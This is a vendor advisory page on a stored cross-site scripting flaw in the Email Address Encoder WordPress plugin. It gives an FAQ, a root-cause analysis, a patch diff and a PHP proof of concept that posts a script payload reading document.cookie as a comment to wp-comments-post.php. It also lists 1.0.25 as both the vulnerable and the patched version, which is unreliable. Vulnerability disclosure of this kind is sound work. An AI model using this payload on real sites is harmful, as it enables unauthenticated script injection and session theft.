What is CVE-2026-5305?

CVE-2026-5305 is a high-severity vulnerability affecting the Email Address Encoder plugin for WordPress. It allows unauthenticated attackers to exploit a stored cross-site scripting (XSS) flaw due to insufficient input sanitization, enabling the injection of arbitrary scripts into web pages.

How does the vulnerability work?

The vulnerability arises from a regex pattern used to detect email addresses, which improperly allows quoted local parts. This enables an attacker to craft an email address that includes malicious scripts, which are then executed when a user accesses the affected page.

Who is affected by this vulnerability?

WordPress sites using the Email Address Encoder plugin versions below 1.0.25 (free) and 0.3.12 (premium) are at risk. Administrators should check their plugin version to determine if they are affected.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Email Address Encoder plugin installed on your WordPress site. If it is below 1.0.25 (free) or 0.3.12 (premium), your site is vulnerable and requires immediate action.

What should I do to fix this vulnerability?

To fix CVE-2026-5305, update the Email Address Encoder plugin to version 1.0.25 or higher. Ensure that all instances of the plugin are updated to eliminate the vulnerability.

What is the risk level associated with this vulnerability?

The vulnerability has a CVSS score of 7.2, indicating a high severity. This means that successful exploitation can lead to significant risks, including session hijacking and credential theft for all users visiting the affected site.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can submit a comment containing a malicious email address with a script payload. When processed by the vulnerable plugin, the script is executed in the browser of any user viewing the page, demonstrating the potential impact of the vulnerability.

What are the potential consequences of exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the context of any user, potentially leading to session hijacking, credential theft, or redirection to malicious sites. This poses a serious risk to the integrity and security of the affected WordPress site.

Is there a way to mitigate the risk if I cannot update immediately?

If immediate updates cannot be performed, consider disabling the Email Address Encoder plugin until a patch is applied. Additionally, monitor user-generated content for suspicious activity as a temporary measure.

What should I do if I have further questions about this vulnerability?

For further questions, consult the plugin’s official documentation or contact a security professional. Keeping abreast of security advisories and updates is crucial for maintaining the security of your WordPress site.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, and conduct periodic security audits of your WordPress site.

Where can I find more information about CVE-2026-5305?

More information about CVE-2026-5305 can be found on the official CVE database and security advisories from trusted sources. Additionally, the Atomic Edge analysis provides detailed insights into the vulnerability and its implications.

Published : June 20, 2026

CVE-2026-5305: Email Encoder < 0.3.12 (premium) < 1.0.25 (free) Unauthenticated Stored Cross-Site Scripting PoC, Patch Analysis & Rule

CVE ID CVE-2026-5305

Plugin email-address-encoder

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.0.25

Patched Version 1.0.25

Disclosed June 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5305:

The Email Address Encoder plugin for WordPress versions below 1.0.25 (free) and below 0.3.12 (premium) contain an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw resides in the regex pattern used to detect email addresses within post content. The regex accepts quoted local parts of email addresses without proper sanitization, allowing an attacker to inject arbitrary HTML and JavaScript. This vulnerability is assigned a CVSS score of 7.2.

Root cause: The vulnerable regex pattern is defined in /email-address-encoder/email-address-encoder.php on lines 34-44. The original pattern includes the alternation ‘|””‘ on line 39, which matches a double-quoted local part of an email address. This component captures content between quotes without restricting the characters allowed. When the plugin subsequently encodes matched email addresses, it does not escape or validate the content within these quotes. The broken regex effectively passes unsanitized user input directly into the output HTML.

Exploitation: An unauthenticated attacker can submit a comment, post, or any user-generated content containing a crafted string that matches the vulnerable regex. The payload follows the format ‘”alert(1)”@example.com’. When the plugin processes this content, it encodes the email address but preserves the injected script. Any user viewing the affected page will execute the script.

Patch Analysis: The patch removes the quoted local part alternative ‘””‘ from the regex pattern on line 39 of the diff. This eliminates the ability to inject content within double quotes as part of the email address pattern. After patching, the regex only matches local parts consisting of standard characters (letters, digits, and specific symbols), which cannot contain script payloads.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user viewing the affected page. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. Because the vulnerability requires no authentication, the attack surface includes all visitors to the WordPress site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/email-address-encoder/email-address-encoder.php
+++ b/email-address-encoder/email-address-encoder.php
@@ -3,7 +3,7 @@
 Plugin Name: Email Address Encoder
 Plugin URI: https://encoder.till.im/
 Description: A lightweight plugin that protects email addresses from email-harvesting robots by encoding them into decimal and hexadecimal entities.
-Version: 1.0.24
+Version: 1.0.25
 Author: Till Krüss
 Author URI: https://till.im/
 Text Domain: email-address-encoder
@@ -34,8 +34,6 @@
             (?:mailto:)?
             (?:
                 [-!#$%&*+/=?^_`.{|}~wx80-xFF]+
-            |
-                ".*?"
             )
             @
             (?:

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-5305 - Email Encoder < 0.3.12 (premium) < 1.0.25 (free) - Unauthenticated Stored Cross-Site Scripting

$target_url = 'http://example.com'; // Change this to the target WordPress site

// The payload is a fake email address with a quoted local part containing JavaScript
$payload = '"<script>alert(document.cookie)</script>"@example.com';

// We inject the payload into a new post or comment. For demonstration, we use a POST request to /wp-comments-post.php
// which is typically accessible without authentication.
$comment_data = array(
    'comment' => $payload,
    'author' => 'Attacker',
    'email' => 'attacker@example.com',
    'url' => '',
    'comment_post_ID' => 1, // Target a valid post ID
    'submit' => 'Post Comment'
);

$ch = curl_init($target_url . '/wp-comments-post.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($comment_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic Edge PoC');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 || $http_code == 302) {
    echo "Payload submitted successfully.n";
    echo "The injected comment will execute when a user views the post.n";
} else {
    echo "Failed to submit payload. HTTP code: $http_coden";
}

Frequently Asked Questions

What is CVE-2026-5305?
Overview of the vulnerability
CVE-2026-5305 is a high-severity vulnerability affecting the Email Address Encoder plugin for WordPress. It allows unauthenticated attackers to exploit a stored cross-site scripting (XSS) flaw due to insufficient input sanitization, enabling the injection of arbitrary scripts into web pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a regex pattern used to detect email addresses, which improperly allows quoted local parts. This enables an attacker to craft an email address that includes malicious scripts, which are then executed when a user accesses the affected page.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress sites using the Email Address Encoder plugin versions below 1.0.25 (free) and 0.3.12 (premium) are at risk. Administrators should check their plugin version to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the Email Address Encoder plugin installed on your WordPress site. If it is below 1.0.25 (free) or 0.3.12 (premium), your site is vulnerable and requires immediate action.
What should I do to fix this vulnerability?
Mitigation steps
To fix CVE-2026-5305, update the Email Address Encoder plugin to version 1.0.25 or higher. Ensure that all instances of the plugin are updated to eliminate the vulnerability.
What is the risk level associated with this vulnerability?
Understanding CVSS score
The vulnerability has a CVSS score of 7.2, indicating a high severity. This means that successful exploitation can lead to significant risks, including session hijacking and credential theft for all users visiting the affected site.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept illustrates how an attacker can submit a comment containing a malicious email address with a script payload. When processed by the vulnerable plugin, the script is executed in the browser of any user viewing the page, demonstrating the potential impact of the vulnerability.
What are the potential consequences of exploitation?
Impact of successful attacks
If exploited, an attacker can execute arbitrary JavaScript in the context of any user, potentially leading to session hijacking, credential theft, or redirection to malicious sites. This poses a serious risk to the integrity and security of the affected WordPress site.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary measures
If immediate updates cannot be performed, consider disabling the Email Address Encoder plugin until a patch is applied. Additionally, monitor user-generated content for suspicious activity as a temporary measure.
What should I do if I have further questions about this vulnerability?
Seeking additional information
For further questions, consult the plugin’s official documentation or contact a security professional. Keeping abreast of security advisories and updates is crucial for maintaining the security of your WordPress site.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, and conduct periodic security audits of your WordPress site.
Where can I find more information about CVE-2026-5305?
Resources for deeper understanding
More information about CVE-2026-5305 can be found on the official CVE database and security advisories from trusted sources. Additionally, the Atomic Edge analysis provides detailed insights into the vulnerability and its implications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations